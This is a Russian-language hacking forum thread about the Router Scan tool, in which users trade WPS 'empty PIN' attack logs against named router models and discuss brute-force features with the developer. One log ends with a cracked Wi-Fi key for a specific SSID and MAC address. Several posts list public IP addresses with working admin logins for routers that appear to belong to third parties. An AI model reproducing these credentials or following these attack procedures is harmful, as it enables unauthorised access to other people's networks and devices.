прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    [​IMG]
     
    Dj-SeReDa, sha9, carartem02 and 3 others like this.
  2. CRACK211

    CRACK211 Elder - Старейшина

    Joined:
    16 Sep 2009
    Messages:
    1,047
    Likes Received:
    1,127
    Reputations:
    11
    Это я знаю) спасибо ) я к тому что в базе к одной точке есть по несколько паролей, а отображается только один
     
  3. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Может что-нибудь придумаю. Пока выводится только самый свежий.
     
  4. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    271
    Likes Received:
    46
    Reputations:
    0
    RTL8671 по идее должен прокатывать алгоритм с пустым PIN, но такое впечатление что заблокирован перебор.
    На GPON ZTE F660, EAP сессия сбрасывается после M2, но там ошибка: (-) Unknown error 0000.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 5829F54B2AA73C25495DB703279A4B96
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: RTL8671
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: Internet Router Device
    [*] Sending WPS Message M2...
    [*] R-Nonce: 859B608716A0F2B7A9BE27BCDB01BE68
    [*] PKR: 13E082ED9034111B127D49AE9FA3D33F3C7BD2BA9DA4ED486B60C45AFCDDE2E9E141FB769DD77C6AE253CFC3333715599B0BEDFF66C0BBF54D429AD882CA4B03A77477D591ED06A432D509C611B9B309747550F138A8FDF36639D1733C6720BDB6E9DEE322795DA2EAB1A0984812DEAEF30257B897D9F224C3D68AF468B7B2980C7406428388CFEBA8528B5CD5D3C199F49E72BC5D7A93C14E0E92B436F9916DE0CC39C6793CAEADF89ECCE1DD438BB545E5EE5D12C73E342A99B01911F849E2
    [*] AuthKey: F00B83591BA9256E4E99E4032BB6260ED07B3C667CB08BEDD1C919C38ADDC25D
    [*] Received WSC NACK.
    [-] Unknown error 000B.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 5979668F313C642D73D4DF9B1CA47486
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Sending WPS Message M2...
    [*] R-Nonce: 2FC38B5CB8F8C0FF64145482A4B4309B
    [*] PKR: AC67897FBE661FB9396B7CB672E4254D8CED1CEFAFA4EBD9A84FF5619DFE8996A99EE81681AA3AB2C0DB6F3AC9DC03F0F72B47005FFA5E327790CC35AAB420C7A447827393047ADE9648C1D009ECB0E159590CCD50CFB42395CAC6B55F14698747E25EF961448FFB768DA8B7A8118FAB3CE5181F64C22F8B11593943B9351E2E5D36173DBB7ABC87977F83857C441BB866B3C4865CF7E9A576F837F32C6D496E4FBC380F558B3D1BA68878789FB6D4CF4AE3AD8B86BCD039E607989D9566665C
    [*] AuthKey: 7FA28EC0F50F77359BFCB3993471C5ECF5F1D9A91264B197ED37EFF48E5AFDF1
    [*] Received WSC NACK.
    [-] Unknown error 000B.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Associating with AP...
    [*] Audit stopped.
     
  5. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Не всегда и не везде. ANUS DSL-N10E неуязвим.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 0000054900003215000068E800006EF6
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: Realtek Semiconductor Corp.
    [*] Model Name: ADSL Router
    [*] Model Number: EV-2006-07-27
    [*] Serial Number: 123456789012347
    [*] Device Name: ADSL Router/Modem IGD
    [*] Sending WPS Message M2...
    [*] R-Nonce: 667EF5C0EF2DBC567598BC4E2BB43925
    [*] PKR: D4970C4AF53F62ADD84844A39204EACA280A4E307FF93BDE1FE795869CB90B0202A3F94D164592BFB3508125C7E281F81C5CFFDEF29AF6AE3C9BF0310D34CFE4B59CD6138B1228807164306EA7347756B68F030A74CD94BC60702F1130F835E8B74C59E7E72FA0951B86F6761B174B598A699CFB9E279699FFDE1FEA9EA8A08156171C16A0E9757B44B4A262D8F44FE550CE12991AF06556E22A4B7339644E9CBE29373F93F801B38EE72DFA53677E8779BAF9899179A0CA56C2D17B701B0C75
    [*] AuthKey: 3F3303AC6584CDA3A9DDFE54CEA197CBEF3D23B2D4B24A5015CD00DD9C929F8A
    [*] Received WPS Message M3.
    [*] E-Hash1: 3B8173FFB0BE32F3DC3338CE99ADC76DC89B39B02BB4B7176D8B5F3D79F98F5F
    [*] E-Hash2: BFEB10CE495FFE856F7AE78FE88B8895070E538FD4C6D939169BB83ECA125197
    [*] Sending WPS Message M4...
    [*] Received WSC NACK.
    [-] Error: Wrong PIN code.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Audit stopped.
     
    sha9 likes this.
  6. PSYDRUGS

    PSYDRUGS Member

    Joined:
    1 Sep 2011
    Messages:
    271
    Likes Received:
    46
    Reputations:
    0
    Печалька. Ещё один из иследованных на уязвимость пустого PIN, D-Link DIR-620 MAC: EC:22:80:FA:AD:61.
    Больше просканировать не смогу, нужно антенну менять на Yagi или сменить текущее местоположение.
    [*] Audit started.
    [*] Associating with AP...
    [+] Associated successfully.
    [*] Trying pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 660C0DFF12F9BDC677A0E6BE2BD66B76
    [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B
    [*] Manufacturer: D-Link Systems
    [*] Model Name: DIR-620
    [*] Model Number: DIR-620
    [*] Serial Number: 123456789012347
    [*] Device Name: DIR-620
    [*] Sending WPS Message M2...
    [*] R-Nonce: 5BEF3FD53F7533978E4D619760F93935
    [*] PKR: 72EEEDCB5B4D40FEBB4C5CCC6DD6B8EA522FE1D3907CCABDBC8B664E2F259324702718068AAD99CE57EA3C12A6D5F0008197D3A7FED3F43D1F564EC4E22A09BE9C7C3F688645E37F54F784BEAC28ED0BC47EF3714AFE0ADD5F4C4F61F14A4C31E5902C310858DB07F0C9AE08DA14A0159FDE51A3D8C19F936B96C8F61F506C652EF0D1366A40B969FC891059DCD96F9CB5D629FF55650319BBD64E7AE8A4858B82D9D55D8B91E83189C927C51E5F06F2FACFE264DFEC6CD0C5A0241ABA384754
    [*] AuthKey: 1AE8737538B55CF224442E4ACC0303B67C7755919B63623FF602BA59FB21C855
    [*] Received WPS Message M3.
    [*] E-Hash1: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC
    [*] E-Hash2: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC
    [*] Sending WPS Message M4...
    [*] Received WPS Message M3.
    [*] E-Hash1: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC
    [*] E-Hash2: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC
    [*] Received WPS Message M5.
    [+] First half found: <empty>
    [*] Sending WPS Message M6...
    [*] Received WPS Message M7.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [+] WPS PIN: <empty>
    [+] SSID: onlime_100
    [+] Key: 9661108807
    [+] Key Index: 1
    [*] Audit stopped.
     
  7. leonid2012lnv

    leonid2012lnv Member

    Joined:
    10 Mar 2017
    Messages:
    26
    Likes Received:
    10
    Reputations:
    0
    Всем привет.ADSL Modem/Router ZTE ZXHN H108N наконец-то поддался ,как и предполагали,пустой PIN(<empty>) Сработала ночная сборка ! С КАЛИ так и не смог добиться результата,но отношу это к кривизне своих ручек.
     
    #4507 leonid2012lnv, 21 Sep 2017
    Last edited: 21 Sep 2017
    sha9, binarymaster and CRACK211 like this.
  8. antis17

    antis17 Well-Known Member

    Joined:
    25 Apr 2017
    Messages:
    158
    Likes Received:
    1,231
    Reputations:
    5
    Не парсит данные.

    Cisco Linksys WRT54GCv3
    86.100.77.18:8080 admin:123456

    [​IMG]
     
    Kakoluk, sha9, Upsurt and 1 other person like this.
  9. antis17

    antis17 Well-Known Member

    Joined:
    25 Apr 2017
    Messages:
    158
    Likes Received:
    1,231
    Reputations:
    5
    94.240.220.50:80 admin:slayerlan
    94.240.220.115:80 admin:slayerlan
    94.240.220.182:80 admin:slayerlan

    [​IMG]
     
  10. Gashek

    Gashek Well-Known Member

    Joined:
    16 Feb 2017
    Messages:
    220
    Likes Received:
    744
    Reputations:
    13
    Подтверждаю ZXNH H118N успешно сдался,
    DIR-825AC пока не поддаётся, возможно из за не стабильного сигнала.
     
    sha9 and binarymaster like this.
  11. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    binarymaster, не совсем очевидно, что из wps генератора пины автоматом переносятся в брут. Может пункт в меню на кнопке Море сделать?
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Какой именно пункт?

    По-моему всё вполне очевидно, эта интеграция изначально была задумана, чтобы нажимать меньше кнопок, доводя всё до автоматизма. Причём, список пинов переносится, только если генератору была задана целевая (выбранная в target) сеть.
     
    sha9 likes this.
  13. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Пофиксил.
     
    sha9, Mednik, Payer and 5 others like this.
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Это была регрессия, спасибо! Поправил. :)

    А всё потому, что почти у каждой модели Linksys веб интерфейс похож лишь внешне, внутренности полностью отличаются (пути страниц, сигнатуры, и т.п.)
     
    sha9, Mednik, Payer and 4 others like this.
  15. Kakoluk

    Kakoluk Banned

    Joined:
    14 Aug 2015
    Messages:
    514
    Likes Received:
    704
    Reputations:
    4
    Поддерживаю. Когда "великолепный робот"("тупой", известный, повторяющийся алгоритм) высвобождает человека для творчества(нового поиска)..
    Ни фига плохого в этом нет. Автоматические-рутинные-повторяющиеся операции, удел роботов/машин/инструментов. И пусть так будет вечно.
    Думаю, нужно определить кодекс, насколько машины(II) должны за нас думать. :)
     
    sha9 and binarymaster like this.
  16. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    Ну не знаю, Generate all wps, например. Ну чтобы лишний раз в генератор не заходить, и по этому пункту будут генерироваться все пины. Как раз автоматизма больше будет.
    Или даже пункт с галочкой, чтобы для каждой сети пины брались не из листа, а генерировались автоматом.
     
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    А, в этом смысле... но тут я сталкиваюсь с тем, что генератора два - встроенный и онлайновый, и дублировать пункты главного меню совсем не хочется, тем более есть горячие клавиши (Ctrl+W / Alt+W).

    Соглашусь с тем, что смена фокуса с формы аудита на основную, и выбор сети в таблице, отнимает некоторое время. Думаю, компромиссным вариантом будет обработка этих же горячих клавиш на форме аудита.
     
    sha9 and exzet like this.
  18. exzet

    exzet Active Member

    Joined:
    26 May 2017
    Messages:
    67
    Likes Received:
    110
    Reputations:
    0
    А если, ну как вариант... Радиокнопки они же несут чисто информативную нагрузку. Вот если их изменить для онлайн и офлайн генератора? Т.е. без окна генератора, а сразу из памяти пины берутся или заносятся в лист, для наглядности.

    И еще небольшой реквест. Удобно было бы, если на форме был прогресс бар или в окне статуса показывались проценты. А то так закинешь пачку пинов и не знаешь.

    Тут вылез небольшой баг - уровень сигнала в окне аудита не всегда сразу показывает нужный уровень, надо несколько раз аудит попытаться запустить чтобы заработало.
     
    sha9 likes this.
  19. antis17

    antis17 Well-Known Member

    Joined:
    25 Apr 2017
    Messages:
    158
    Likes Received:
    1,231
    Reputations:
    5
    Не парсит данные.

    Genexis HRG1000
    92.37.5.33:80 admin:admin

    [​IMG]

    [​IMG]
     
    binarymaster likes this.
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Нет, их менять не хочу, пусть так останутся.
    Это имеет отношение к тому, что я предложил выше.
    Это можно, скорее будут проценты, как в reaver.
    Уровень сигнала обновляется по мере обновления данных в таблице. Если сканирование сетей отключено, значение обновляться не будет (точнее будет, но другим способом, не самым точным).
     
    Kakoluk, sha9 and Payer like this.